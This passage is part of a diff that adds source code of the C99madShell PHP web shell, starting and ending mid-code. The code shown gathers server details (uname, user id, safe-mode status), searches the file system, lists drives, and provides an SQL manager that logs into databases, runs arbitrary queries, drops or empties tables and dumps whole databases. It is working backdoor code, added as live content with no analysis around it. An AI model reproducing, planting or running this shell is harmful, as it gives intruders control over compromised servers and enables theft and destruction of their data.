+ $query = trim($query);
+ $arr = explode (" ",$query);
+ /*array array()
+ {
+  "METHOD"=>array(output_type),
+  "METHOD1"...
+  ...
+ }
+ if output_type == 0, no output,
+ if output_type == 1, no output if no error
+ if output_type == 2, output without control-buttons
+ if output_type == 3, output with control-buttons
+ */
+ $types = array(
+  "SELECT"=>array(3,1),
+  "SHOW"=>array(2,1),
+  "DELETE"=>array(1),
+  "DROP"=>array(1)
+ );
+ $result = array();
+ $op = strtoupper($arr[0]);
+ if (is_array($types[$op]))
+ {
+  $result["propertions"] = $types[$op];
+  $result["query"]  = $query;
+  if ($types[$op] == 2)
+  {
+   foreach($arr as $k=>$v)
+   {
+    if (strtoupper($v) == "LIMIT")
+    {
+     $result["limit"] = $arr[$k+1];
+     $result["limit"] = explode(",",$result["limit"]);
+     if (count($result["limit"]) == 1) {$result["limit"] = array(0,$result["limit"][0]);}
+     unset($arr[$k],$arr[$k+1]);
+    }
+   }
+  }
+ }
+ else {return FALSE;}
+}
+}
+if (!function_exists("c99fsearch"))
+{
+function c99fsearch($d)
+{
+ global $found;
+ global $found_d;
+ global $found_f;
+ global $search_i_f;
+ global $search_i_d;
+ global $a;
+ if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
+ $h = opendir($d);
+ while (($f = readdir($h)) !== FALSE)
+ {
+  if($f != "." && $f != "..")
+  {
+   $bool = (empty($a["name_regexp"]) and strpos($f,$a["name"]) !== FALSE) || ($a["name_regexp"] and ereg($a["name"],$f));
+   if (is_dir($d.$f))
+   {
+    $search_i_d++;
+    if (empty($a["text"]) and $bool) {$found[] = $d.$f; $found_d++;}
+    if (!is_link($d.$f)) {c99fsearch($d.$f);}
+   }
+   else
+   {
+    $search_i_f++;
+    if ($bool)
+    {
+     if (!empty($a["text"]))
+     {
+      $r = @file_get_contents($d.$f);
+      if ($a["text_wwo"]) {$a["text"] = " ".trim($a["text"])." ";}
+      if (!$a["text_cs"]) {$a["text"] = strtolower($a["text"]); $r = strtolower($r);}
+      if ($a["text_regexp"]) {$bool = ereg($a["text"],$r);}
+      else {$bool = strpos(" ".$r,$a["text"],1);}
+      if ($a["text_not"]) {$bool = !$bool;}
+      if ($bool) {$found[] = $d.$f; $found_f++;}
+     }
+     else {$found[] = $d.$f; $found_f++;}
+    }
+   }
+  }
+ }
+ closedir($h);
+}
+}
+if ($act == "gofile") {if (is_dir($f)) {$act = "ls"; $d = $f;} else {$act = "f"; $d = dirname($f); $f = basename($f);}}
+//Sending headers
+@ob_start();
+@ob_implicit_flush(0);
+function onphpshutdown()
+{
+ global $gzipencode,$ft;
+ if (!headers_sent() and $gzipencode and !in_array($ft,array("img","download","notepad")))
+ {
+  $v = @ob_get_contents();
+  @ob_end_clean();
+  @ob_start("ob_gzHandler");
+  echo $v;
+  @ob_end_flush();
+ }
+}
+function c99shexit()
+{
+ onphpshutdown();
+ exit;
+}
+header("Expires: Mon, 26 Jul 1997 05:00:00 GMT");
+header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT");
+header("Cache-Control: no-store, no-cache, must-revalidate");
+header("Cache-Control: post-check=0, pre-check=0", FALSE);
+header("Pragma: no-cache");
+if (empty($tmpdir))
+{
+ $tmpdir = ini_get("upload_tmp_dir");
+ if (is_dir($tmpdir)) {$tmpdir = "/tmp/";}
+}
+$tmpdir = realpath($tmpdir);
+$tmpdir = str_replace("\\",DIRECTORY_SEPARATOR,$tmpdir);
+if (substr($tmpdir,-1) != DIRECTORY_SEPARATOR) {$tmpdir .= DIRECTORY_SEPARATOR;}
+if (empty($tmpdir_logs)) {$tmpdir_logs = $tmpdir;}
+else {$tmpdir_logs = realpath($tmpdir_logs);}
+if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
+{
+ $safemode = TRUE;
+ $hsafemode = "<font color=red>ON (secure)</font>";
+}
+else {$safemode = FALSE; $hsafemode = "<font color=green>OFF (not secure)</font>";}
+$v = @ini_get("open_basedir");
+if ($v or strtolower($v) == "on") {$openbasedir = TRUE; $hopenbasedir = "<font color=red>".$v."</font>";}
+else {$openbasedir = FALSE; $hopenbasedir = "<font color=green>OFF (not secure)</font>";}
+$sort = htmlspecialchars($sort);
+if (empty($sort)) {$sort = $sort_default;}
+$sort[1] = strtolower($sort[1]);
+$DISP_SERVER_SOFTWARE = getenv("SERVER_SOFTWARE");
+if (!ereg("PHP/".phpversion(),$DISP_SERVER_SOFTWARE)) {$DISP_SERVER_SOFTWARE .= ". PHP/".phpversion();}
+$DISP_SERVER_SOFTWARE = str_replace("PHP/".phpversion(),"<a href=\"#\" onclick=\"document.todo.act.value='phpinfo';document.todo.submit();\"><b><u>PHP/".phpversion()."</u></b></a>",htmlspecialchars($DISP_SERVER_SOFTWARE));
+@ini_set("highlight.bg",$highlight_bg); //FFFFFF
+@ini_set("highlight.comment",$highlight_comment); //#FF8000
+@ini_set("highlight.default",$highlight_default); //#0000BB
+@ini_set("highlight.html",$highlight_html); //#000000
+@ini_set("highlight.keyword",$highlight_keyword); //#007700
+@ini_set("highlight.string",$highlight_string); //#DD0000
+if (!is_array($actbox)) {$actbox = array();}
+$dspact = $act = htmlspecialchars($act);
+$disp_fullpath = $ls_arr = $notls = null;
+$ud = urlencode($d);
+?><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"><meta http-equiv="Content-Language" content="en-us"><title><?php echo getenv("HTTP_HOST"); ?> - c99madshell</title><STYLE>TD { FONT-SIZE: 8pt; COLOR: #ebebeb; FONT-FAMILY: verdana;}BODY { scrollbar-face-color: #800000; scrollbar-shadow-color: #101010; scrollbar-highlight-color: #101010; scrollbar-3dlight-color: #101010; scrollbar-darkshadow-color: #101010; scrollbar-track-color: #101010; scrollbar-arrow-color: #101010; font-family: Verdana;}TD.header { FONT-WEIGHT: normal; FONT-SIZE: 10pt; BACKGROUND: #7d7474; COLOR: white; FONT-FAMILY: verdana;}A { FONT-WEIGHT: normal; COLOR: #dadada; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A.Links { COLOR: #ffffff; TEXT-DECORATION: none;}A.Links:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; TEXT-DECORATION: none;}A:hover { COLOR: #ffffff; TEXT-DECORATION: underline;}.skin0{position:absolute; width:200px; border:2px solid black; background-color:menu; font-family:Verdana; line-height:20px; cursor:default; visibility:hidden;;}.skin1{cursor: default; font: menutext; position: absolute; width: 145px; background-color: menu; border: 1 solid buttonface;visibility:hidden; border: 2 outset buttonhighlight; font-family: Verdana,Geneva, Arial; font-size: 10px; color: black;}.menuitems{padding-left:15px; padding-right:10px;;}input{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}textarea{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}button{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}select{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}option {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}iframe {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}p {MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; LINE-HEIGHT: 150%}blockquote{ font-size: 8pt; font-family: Courier, Fixed, Arial; border : 8px solid #A9A9A9; padding: 1em; margin-top: 1em; margin-bottom: 5em; margin-right: 3em; margin-left: 4em; background-color: #B7B2B0;}body,td,th { font-family: verdana; color: #d9d9d9; font-size: 11px;}body { background-color: #000000;}</style></head><BODY text=#ffffff bottomMargin=0 bgColor=#000000 leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0><form name='todo' method='POST'><input name='act' type='hidden' value=''><input name='grep' type='hidden' value=''><input name='fullhexdump' type='hidden' value=''><input name='base64' type='hidden' value=''><input name='nixpasswd' type='hidden' value=''><input name='pid' type='hidden' value=''><input name='c' type='hidden' value=''><input name='white' type='hidden' value=''><input name='sig' type='hidden' value=''><input name='processes_sort' type='hidden' value=''><input name='d' type='hidden' value=''><input name='sort' type='hidden' value=''><input name='f' type='hidden' value=''><input name='ft' type='hidden' value=''></form><center><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><th width="101%" height="15" nowrap bordercolor="#C0C0C0" valign="top" colspan="2"><p><font face=Webdings size=6><b>!</b></font><a href="<?php echo $surl; ?>"><font face="Verdana" size="5"><b>C99madShell v. <?php echo $shver; ?></b></font></a><font face=Webdings size=6><b>!</b></font></p></center></th></tr><tr><td><p align="left"><b>Software:&nbsp;<?php echo $DISP_SERVER_SOFTWARE; ?></b>&nbsp;</p><p align="left"><b>uname -a:&nbsp;<?php echo wordwrap(php_uname(),90,"<br>",1); ?></b>&nbsp;</p><p align="left"><b><?php if (!$win) {echo wordwrap(myshellexec("id"),90,"<br>",1);} else {echo get_current_user();} ?></b>&nbsp;</p><p align="left"><b>Safe-mode:&nbsp;<?php echo $hsafemode; ?></b></p><p align="left"><?php
+$d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
+if (empty($d)) {$d = realpath(".");} elseif(realpath($d)) {$d = realpath($d);}
+$d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
+if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
+$d = str_replace("\\\\","\\",$d);
+$dispd = htmlspecialchars($d);
+$pd = $e = explode(DIRECTORY_SEPARATOR,substr($d,0,-1));
+$i = 0;
+foreach($pd as $b)
+{
+ $t = "";
+ $j = 0;
+ foreach ($e as $r)
+ {
+  $t.= $r.DIRECTORY_SEPARATOR;
+  if ($j == $i) {break;}
+  $j++;
+ }
+ echo "<a href=\"#\" onclick=\"document.todo.act.value='ls';document.todo.d.value='".urlencode($t)."';document.todo.sort.value='".$sort."';document.todo.submit();\"><b>".htmlspecialchars($b).DIRECTORY_SEPARATOR."</b></a>";
+ $i++;
+}
+echo "&nbsp;&nbsp;&nbsp;";
+if (is_writable($d))
+{
+ $wd = TRUE;
+ $wdt = "<font color=green>[ ok ]</font>";
+ echo "<b><font color=green>".view_perms(fileperms($d))."</font></b>";
+}
+else
+{
+ $wd = FALSE;
+ $wdt = "<font color=red>[ Read-Only ]</font>";
+ echo "<b>".view_perms_color($d)."</b>";
+}
+if (is_callable("disk_free_space"))
+{
+ $free = disk_free_space($d);
+ $total = disk_total_space($d);
+ if ($free === FALSE) {$free = 0;}
+ if ($total === FALSE) {$total = 0;}
+ if ($free < 0) {$free = 0;}
+ if ($total < 0) {$total = 0;}
+ $used = $total-$free;
+ $free_percent = round(100/($total/$free),2);
+ echo "<br><b>Free ".view_size($free)." of ".view_size($total)." (".$free_percent."%)</b>";
+}
+echo "<br>";
+$letters = "";
+if ($win)
+{
+ $v = explode("\\",$d);
+ $v = $v[0];
+ foreach (range("a","z") as $letter)
+ {
+  $bool = $isdiskette = in_array($letter,$safemode_diskettes);
+  if (!$bool) {$bool = is_dir($letter.":\\");}
+  if ($bool)
+  {
+   $letters .= "<a href=\"#\" onclick=\"document.todo.act.value='ls';document.todo.d.value='".urlencode($letter.":\\")."';document.todo.submit();\">[ ";
+   if ($letter.":" != $v) {$letters .= $letter;}
+   else {$letters .= "<font color=green>".$letter."</font>";}
+   $letters .= " ]</a> ";
+  }
+ }
+ if (!empty($letters)) {echo "<b>Detected drives</b>: ".$letters."<br>";}
+}
+if (count($quicklaunch) > 0)
+{
+ foreach($quicklaunch as $item)
+ {
+  $item[1] = str_replace("%d",urlencode($d),$item[1]);
+  $item[1] = str_replace("%sort",$sort,$item[1]);
+  $v = realpath($d."..");
+  if (empty($v)) {$a = explode(DIRECTORY_SEPARATOR,$d); unset($a[count($a)-2]); $v = join(DIRECTORY_SEPARATOR,$a);}
+  $item[1] = str_replace("%upd",urlencode($v),$item[1]);
+
+  echo "<a href=\"".$item[1]."\">".$item[0]."</a>&nbsp;&nbsp;&nbsp;&nbsp;";
+ }
+}
+echo "</p></td></tr></table><br>";
+if ((!empty($donated_html)) and (in_array($act,$donated_act))) {echo "<TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width=\"100%\" valign=\"top\">".$donated_html."</td></tr></table><br>";}
+echo "<TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width=\"100%\" valign=\"top\">";
+if ($act == "") {$act = $dspact = "ls";}
+if ($act == "sql")
+{
+ echo("<form name='sql' method='POST'><input name='act' type='hidden' value='sql'><input name='sql_tbl_insert_q' type='hidden' value=''><input name='sql_login' type='hidden' value=''><input name='kill' type='hidden' value=''><input name='sql_order' type='hidden' value=''><input name='sql_tbl_ls' type='hidden' value=''><input name='sql_tbl_le' type='hidden' value=''><input name='sql_tbl_act' type='hidden' value=''><input name='thistbl' type='hidden' value=''><input name='sql_passwd' type='hidden' value=''><input name='sql_server' type='hidden' value=''><input name='sql_port' type='hidden' value=''><input name='sql_db' type='hidden' value=''><input name='sql_act' type='hidden' value=''><input name='sql_tbl' type='hidden' value=''><input name='f' type='hidden' value=''><input name='ft' type='hidden' value=''><input name='sql_query' type='hidden' value=''></form>");
+
+ if (isset($_POST['sql_login']))  {$sql_login=htmlspecialchars($_POST['sql_login']);}
+ if (isset($_POST['sql_passwd'])) {$sql_passwd=htmlspecialchars($_POST['sql_passwd']);}
+ if (isset($_POST['sql_server'])) {$sql_server=htmlspecialchars($_POST['sql_server']);}
+ if (isset($_POST['sql_port']))   {$sql_port=htmlspecialchars($_POST['sql_port']);}
+ if (isset($_POST['sql_db']))     {$sql_db=htmlspecialchars($_POST['sql_db']);}
+ if (isset($_POST['sql_act']))     {$sql_act=htmlspecialchars($_POST['sql_act']);}
+ if (isset($_POST['sql_tbl']))     {$sql_tbl=htmlspecialchars($_POST['sql_tbl']);}
+ if (isset($_POST['sql_tbl_act']))     {$sql_tbl_act=htmlspecialchars($_POST['sql_tbl_act']);}
+ if (isset($_POST['thistbl']))     {$thistbl=htmlspecialchars($_POST['thistbl']);}
+ if (isset($_POST['sql_order']))     {$sql_order=htmlspecialchars($_POST['sql_order']);}
+ if (isset($_POST['sql_tbl_ls']))     {$sql_tbl_ls=htmlspecialchars($_POST['sql_tbl_ls']);}
+ if (isset($_POST['sql_tbl_le']))     {$sql_tbl_le=htmlspecialchars($_POST['sql_tbl_le']);}
+ if (isset($_POST['sql_query']))     {$sql_query=htmlspecialchars($_POST['sql_query']);}
+ if (isset($_POST['sql_tbl_insert_q'])) {$sql_tbl_insert_q=urldecode(htmlspecialchars($_POST['sql_tbl_insert_q']));}
+ if (isset($_POST['sql_tbl_insert_functs'])) {$sql_tbl_insert_functs=htmlspecialchars($_POST['sql_tbl_insert_functs']);}
+ if (isset($_POST['sql_tbl_insert_radio'])) {$sql_tbl_insert_radio=htmlspecialchars($_POST['sql_tbl_insert_radio']);}
+
+
+
+ ?><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><td width="100%" height="1" colspan="2" valign="top"><center><?php
+ if ($sql_server)
+ {
+  $sql_sock = mysql_connect($sql_server.":".$sql_port, $sql_login, $sql_passwd);
+  $err = mysql_smarterror();
+  @mysql_select_db($sql_db,$sql_sock);
+  if ($sql_query and $submit) {$sql_query_result = mysql_query($sql_query,$sql_sock); $sql_query_error = mysql_smarterror();}
+ }
+ else {$sql_sock = FALSE;}
+ echo "<b>SQL Manager:</b><br>";
+ if (!$sql_sock)
+ {
+  if (!$sql_server) {echo "NO CONNECTION";}
+  else {echo "<center><b>Can't connect</b></center>"; echo "<b>".$err."</b>";}
+ }
+ else
+ {
+  $sqlquicklaunch = array();
+  $sqlquicklaunch[] = array("Index","#\" onclick=\"document.sql.act.value='sql';document.sql.sql_login.value='".htmlspecialchars($sql_login)."';document.sql.sql_passwd.value='".htmlspecialchars($sql_passwd)."';document.sql.sql_server.value='".htmlspecialchars($sql_server)."';document.sql.sql_port.value='".htmlspecialchars($sql_port)."';document.sql.submit();");
+  $sqlquicklaunch[] = array("Query","#\" onclick=\"document.sql.act.value='sql';document.sql.sql_act.value='query';document.sql.sql_db.value='".urlencode($sql_db)."';document.sql.sql_tbl.value='".urlencode($sql_tbl)."';document.sql.sql_login.value='".htmlspecialchars($sql_login)."';document.sql.sql_passwd.value='".htmlspecialchars($sql_passwd)."';document.sql.sql_server.value='".htmlspecialchars($sql_server)."';document.sql.sql_port.value='".htmlspecialchars($sql_port)."';document.sql.submit();");
+  $sqlquicklaunch[] = array("Server-status","#\" onclick=\"document.sql.act.value='sql';document.sql.sql_login.value='".htmlspecialchars($sql_login)."';document.sql.sql_passwd.value='".htmlspecialchars($sql_passwd)."';document.sql.sql_server.value='".htmlspecialchars($sql_server)."';document.sql.sql_port.value='".htmlspecialchars($sql_port)."';document.sql.sql_act.value='serverstatus';document.sql.submit();");
+  $sqlquicklaunch[] = array("Server variables","#\" onclick=\"document.sql.act.value='sql';document.sql.sql_login.value='".htmlspecialchars($sql_login)."';document.sql.sql_passwd.value='".htmlspecialchars($sql_passwd)."';document.sql.sql_server.value='".htmlspecialchars($sql_server)."';document.sql.sql_port.value='".htmlspecialchars($sql_port)."';document.sql.sql_act.value='servervars';document.sql.submit();");
+  $sqlquicklaunch[] = array("Processes","#\" onclick=\"document.sql.act.value='sql';document.sql.sql_login.value='".htmlspecialchars($sql_login)."';document.sql.sql_passwd.value='".htmlspecialchars($sql_passwd)."';document.sql.sql_server.value='".htmlspecialchars($sql_server)."';document.sql.sql_port.value='".htmlspecialchars($sql_port)."';document.sql.sql_act.value='processes';document.sql.submit();");
+  $sqlquicklaunch[] = array("Logout","#\" onclick=\"document.sql.act.value='sql';document.sql.submit();");
+  echo "<center><b>MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info ().") running in ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." as ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (password - \"".htmlspecialchars($sql_passwd)."\")</b><br>";
+  if (count($sqlquicklaunch) > 0) {foreach($sqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\"><b>".$item[0]."</b></a> ] ";}}
+  echo "</center>";
+ }
+ echo "</td></tr><tr>";
+ if (!$sql_sock) {?><td width="28%" height="100" valign="top"><center><font size="5"> i </font></center><li>If login is null, login is owner of process.<li>If host is null, host is localhost</b><li>If port is null, port is 3306 (default)</td><td width="90%" height="1" valign="top"><TABLE height=1 cellSpacing=0 cellPadding=0 width="100%" border=0><tr><td>&nbsp;<b>Please, fill the form:</b><table><tr><td><b>Username</b></td><td><b>Password</b>&nbsp;</td><td><b>Database</b>&nbsp;</td></tr><form action="<?php echo $surl; ?>" method="POST"><input type="hidden" name="act" value="sql"><tr><td><input type="text" name="sql_login" value="root" maxlength="64"></td><td><input type="password" name="sql_passwd" value="" maxlength="64"></td><td><input type="text" name="sql_db" value="" maxlength="64"></td></tr><tr><td><b>Host</b></td><td><b>PORT</b></td></tr><tr><td align=right><input type="text" name="sql_server" value="localhost" maxlength="64"></td><td><input type="text" name="sql_port" value="3306" maxlength="6" size="3"></td><td><input type="submit" value="Connect"></td></tr><tr><td></td></tr></form></table></td><?php }
+ else
+ {
+  //Start left panel
+  if (!empty($sql_db))
+  {
+   ?><td width="25%" height="100%" valign="top"><a href="#" onclick="document.sql.act.value='sql';document.sql.sql_login.value='<?echo (htmlspecialchars($sql_login)) ?>';document.sql.sql_passwd.value='<?echo (htmlspecialchars($sql_passwd)) ?>';document.sql.sql_server.value='<?echo (htmlspecialchars($sql_server)) ?>';document.sql.sql_port.value='<?echo (htmlspecialchars($sql_port)) ?>';document.sql.submit();"><b>Home</b></a><hr size="1" noshade><?php
+   $result = mysql_list_tables($sql_db);
+   if (!$result) {echo mysql_smarterror();}
+   else
+   {
+    echo "---[ <a href=\"#\" onclick=\"document.sql.act.value='sql';document.sql.sql_db.value='".htmlspecialchars($sql_db)."';document.sql.sql_login.value='".htmlspecialchars($sql_login)."';document.sql.sql_passwd.value='".htmlspecialchars($sql_passwd)."';document.sql.sql_server.value='".htmlspecialchars($sql_server)."';document.sql.sql_port.value='".htmlspecialchars($sql_port)."';document.sql.submit();\"><b>".htmlspecialchars($sql_db)."</b></a> ]---<br>";
+    $c = 0;
+    while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM ".$row[0]); $count_row = mysql_fetch_array($count); echo "<b>»&nbsp;<a href=\"#\" onclick=\"document.sql.act.value='sql';document.sql.sql_login.value='".htmlspecialchars($sql_login)."';document.sql.sql_passwd.value='".htmlspecialchars($sql_passwd)."';document.sql.sql_server.value='".htmlspecialchars($sql_server)."';document.sql.sql_port.value='".htmlspecialchars($sql_port)."';document.sql.sql_db.value='".htmlspecialchars($sql_db)."';document.sql.sql_tbl.value='".htmlspecialchars($row[0])."';document.sql.submit();\"><b>".htmlspecialchars($row[0])."</b></a> (".$count_row[0].")</br></b>"; mysql_free_result($count); $c++;}
+    if (!$c) {echo "No tables found in database.";}
+   }
+  }
+  else
+  {
+   ?><td width="1" height="100" valign="top"><a href="<?php echo $_SERVER['PHP_SELF']; ?>"><b>Home</b></a><hr size="1" noshade><?php
+   $result = mysql_list_dbs($sql_sock);
+   if (!$result) {echo mysql_smarterror();}
+   else
+   {
+    ?><form method="POST"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><select name="sql_db"><?php
+    $c = 0;
+    $dbs = "";
+    while ($row = mysql_fetch_row($result)) {$dbs .= "<option value=\"".$row[0]."\""; if ($sql_db == $row[0]) {$dbs .= " selected";} $dbs .= ">".$row[0]."</option>"; $c++;}
+    echo "<option value=\"\">Databases (".$c.")</option>";
+    echo $dbs;
+   }
+   ?></select><hr size="1" noshade>Please, select database<hr size="1" noshade><input type="submit" value="Go"></form><?php
+  }
+  //End left panel
+  echo "</td><td width=\"100%\" height=\"1\" valign=\"top\">";
+  //Start center panel
+  $diplay = TRUE;
+  if ($sql_db)
+  {
+   if (!is_numeric($c)) {$c = 0;}
+   if ($c == 0) {$c = "no";}
+   echo "<hr size=\"1\" noshade><center><b>There are ".$c." table(s) in this DB (".htmlspecialchars($sql_db).").<br>";
+   if (count($dbquicklaunch) > 0) {foreach($dbsqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\">".$item[0]."</a> ] ";}}
+   echo "</b></center>";
+   $acts = array("","dump");
+   if ($sql_act == "tbldrop") {$sql_query = "DROP TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
+   elseif ($sql_act == "tblempty") {$sql_query = ""; foreach($boxtbl as $v) {$sql_query .= "DELETE FROM `".$v."` \n";} $sql_act = "query";}
+   elseif ($sql_act == "tbldump") {if (count($boxtbl) > 0) {$dmptbls = $boxtbl;} elseif($thistbl) {$dmptbls = array($sql_tbl);} $sql_act = "dump";}
+   elseif ($sql_act == "tblcheck") {$sql_query = "CHECK TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
+   elseif ($sql_act == "tbloptimize") {$sql_query = "OPTIMIZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
+   elseif ($sql_act == "tblrepair") {$sql_query = "REPAIR TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
+   elseif ($sql_act == "tblanalyze") {$sql_query = "ANALYZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
+   elseif ($sql_act == "deleterow") {$sql_query = ""; if (!empty($boxrow_all)) {$sql_query = "DELETE * FROM `".$sql_tbl."`;";} else {foreach($boxrow as $v) {$sql_query .= "DELETE * FROM `".$sql_tbl."` WHERE".$v." LIMIT 1;\n";} $sql_query = substr($sql_query,0,-1);} $sql_act = "query";}
+   elseif ($sql_tbl_act == "insert")
+   {
+    if ($sql_tbl_insert_radio == 1)
+    {
+     $keys = "";
+     $akeys = array_keys($sql_tbl_insert);
+     foreach ($akeys as $v) {$keys .= "`".addslashes($v)."`, ";}
+     if (!empty($keys)) {$keys = substr($keys,0,strlen($keys)-2);}
+     $values = "";
+     $i = 0;
+     foreach (array_values($sql_tbl_insert) as $v) {if ($funct = $sql_tbl_insert_functs[$akeys[$i]]) {$values .= $funct." (";} $values .= "'".addslashes($v)."'"; if ($funct) {$values .= ")";} $values .= ", "; $i++;}
+     if (!empty($values)) {$values = substr($values,0,strlen($values)-2);}
+     $sql_query = "INSERT INTO `".$sql_tbl."` ( ".$keys." ) VALUES ( ".$values." );";
+     $sql_act = "query";
+     $sql_tbl_act = "browse";
+    }
+    elseif ($sql_tbl_insert_radio == 2)
+    {
+     $set = mysql_buildwhere($sql_tbl_insert,", ",$sql_tbl_insert_functs);
+     $sql_query = "UPDATE `".$sql_tbl."` SET ".$set." WHERE ".$sql_tbl_insert_q." LIMIT 1;";
+     $result = mysql_query($sql_query) or print(mysql_smarterror());
+     $result = mysql_fetch_array($result, MYSQL_ASSOC);
+     $sql_act = "query";
+     $sql_tbl_act = "browse";
+    }
+   }
+   if ($sql_act == "query")
+   {
+    $sql_query = urldecode($sql_query);
+    echo "<hr size=\"1\" noshade>";
+    if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";}
+    if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;}
+    if ((!$submit) or ($sql_act)) {echo "<table border=\"0\" width=\"100%\" height=\"1\"><tr><td><form method=\"POST\"><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to:";} else {echo "SQL-Query :";} echo "</b><br><br><textarea name=\"sql_query\" cols=\"100\" rows=\"10\">".htmlspecialchars($sql_query)."</textarea><br><br><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_act\" value=\"query\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"submit\" value=\"1\"><input type=\"hidden\" name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=\"submit\" name=\"sql_confirm\" value=\"Yes\">&nbsp;<input type=\"submit\" value=\"No\"></form></td></tr></table>";}
+   }
+   if (in_array($sql_act,$acts))
+   {
+    ?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new table:</b><form method="POST"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newtbl"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newtbl" size="20">&nbsp;<input type="submit" value="Create"></form></td><td width="30%" height="1"><b>Dump DB:</b><form method="POST"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="dump"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="dump_file" size="30" value="<?php echo "dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql"; ?>">&nbsp;<input type="submit" name=\"submit\" value="Dump"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php
+    if (!empty($sql_act)) {echo "<hr size=\"1\" noshade>";}
+    if ($sql_act == "newtbl")
+    {
+     echo "<b>";
